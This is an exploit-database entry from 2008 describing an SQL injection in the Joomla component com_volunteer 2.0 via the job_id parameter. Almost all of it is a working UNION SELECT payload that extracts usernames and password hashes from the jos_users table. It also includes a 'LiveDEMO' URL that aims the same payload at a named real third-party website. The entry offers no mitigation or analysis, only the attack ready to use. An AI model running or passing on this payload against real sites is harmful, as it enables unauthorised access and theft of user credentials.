id: 4522
date: 12/22/2008
title: Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability
author: boom3rang
cves: 

===================================================================
Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability
===================================================================



#############################################################
Joomla Component com_volunteer(job_id) SQL-injection
#############################################################


###################################################
#[~] Author  :   boom3rang 
----------------------------------------
#[!] <name>Volunteer</name>
#[!] <creationDate>05.04.2007</creationDate>
#[!] <author>John Pan</author>
#[!] <version>2.0</version>
###################################################

Example:
http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]

Exploit:
-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

LiveDEMO:
http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1

##############################



#  0day.today [2023-03-25]  #